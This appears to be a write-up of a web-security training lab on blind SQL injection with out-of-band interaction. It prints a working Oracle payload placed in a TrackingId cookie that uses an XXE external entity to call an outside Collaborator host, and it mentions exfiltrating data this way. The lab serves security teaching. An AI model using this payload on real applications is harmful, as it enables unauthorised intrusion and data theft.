Blind SQL injection with out-of-band interaction
This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs an SQL query containing the value of the submitted cookie.
The SQL query is executed asynchronously and has no effect on the application’s response. However, you can trigger out-of-band interactions with an external domain.
Burp Suite Professional is required to solve this lab!
Reproduction and proof of concept
Visit the Home page of the shop, and use Burp Suite to intercept and modify the request containing the
Modify the TrackingId cookie, changing it to a payload that will trigger an interaction with the Collaborator server. For example, SQL injection can be combined with basic XXE techniques:
Right-click and select “Insert Collaborator payload” to insert a Burp Collaborator subdomain where indicated in the modified TrackingId cookie (Use the cheatsheet to create payloads).
TrackingId=3vN9DLaImMIfzJgX' || (SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://e0fmgwxdxyfjykzktu8mtaj06rci0bo0.oastify.com/"> %remote;]>'),'/l') FROM dual)--
Send, and check in the Collaborator tab that the payload had indeed triggered a DNS lookup and potentially exploit this behaviour to exfiltrate sensitive data from the application.:
To prevent the Academy platform being used to attack third parties, the firewall blocks interactions between the labs and arbitrary external systems. To solve the lab, you must use Burp Collaborator’s default public server. To solve the lab, it is required to exploit the SQL injection vulnerability to cause a DNS lookup to Burp Collaborator. Burp Collaborator is only available in the Enterprise and Professional editions. You can apply for a free 30-day trial here.